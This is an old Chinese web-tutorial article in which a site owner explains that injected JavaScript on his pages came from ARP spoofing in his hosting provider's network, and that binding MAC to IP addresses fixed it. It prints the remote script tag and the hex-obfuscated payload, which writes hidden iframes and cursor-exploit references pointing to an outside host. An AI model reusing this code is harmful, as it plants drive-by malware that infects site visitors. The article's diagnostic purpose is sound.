当前位置: 首页 > 图文教程 > 网络编程 > Javascript > 网站被黑的假象--ARP欺骗之页面中加入一段js

Javascript
javascript 面向对象的经典实例代码
javascript prototype原型操作笔记
JavaScript 常见对象类创建代码与优缺点分析
javascript 混合的构造函数和原型方式,动态原型方式
测试JavaScript字符串处理性能的代码
JQuery 表单中textarea字数限制实现代码
jQuery Selectors(选择器)的使用(六、属性篇)
IE浏览器打印的页眉页脚设置解决方法
javascript检测(控制 )上传文件大小
jquery 双色表格实现代码
JavaScript Cookie的读取和写入函数
JavaScript 利用Cookie记录用户登录信息
JavaScript Cookie显示用户上次访问的时间和次数
JavaScript Cookie 直接浏览网站分网址
javascript OFFICE控件测试代码
javascript setTimeout和setInterval 的区别
javascript弹出窗口 window.open使用方法以及参数说明分析篇
可以用来搜索当前页面内容的js代码
动态调整textarea中字体的大小代码
为指定元素增加样式的js代码

Javascript 中的 网站被黑的假象--ARP欺骗之页面中加入一段js


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-12   浏览: 180 ::
收藏到网摘: n/a

昨天晚上发现访问我的网站的时候网页代码html的前面多了一串js代码。刚开始以为网站被黑了,赶紧到服务器上查看所有文件是否带有这串js代码,搜索结果没有,而且服务器也没发现被入侵的痕迹。
<script src=http://fuck.ns2go.com/dir/index_pic/1.js></script>
于是只能从这段代码入手,我下载这个js开发发现是下面一段代码:
复制代码 代码如下:

window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x31\x2e\x67\x69\x66\'\x29\"\x3e");
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x32\x2e\x67\x69\x66\'\x29\"\x3e\x3c\/\x44\x49\x56\x3e\x3c\/\x44\x49\x56\x3e");
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x30\x36\x30\x31\x34\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x31 \x68\x65\x69\x67\x68\x74\x3d\x31\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e");
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x74\x6a\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x30 \x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e")

在google上搜索发现有人已经发现同样情况.http://0e2.net/post/676.html
看了这篇文章之后了解到不是服务器被黑了,而是服务器所在的机房内网有中木马病毒的主机在搞arp欺骗.
这些木马捕抓了我的服务器发送出来的报文之后,篡改了报文的内容,在html头加入了前面那段木马病毒代码.然后再转发给访问我网站的用户主机.这段木马是针对ie的ani漏洞的,微软用户的电脑要赶紧升级打补丁.
最后问题就在于如何让我的服务器防止被ARP欺骗.打电话到机房,技术人员让我们将mac和ip地址绑定,问题终于解决.
关于ARP欺骗相关知识:
http://zhidao.baidu.com/question/7980952.html?si=1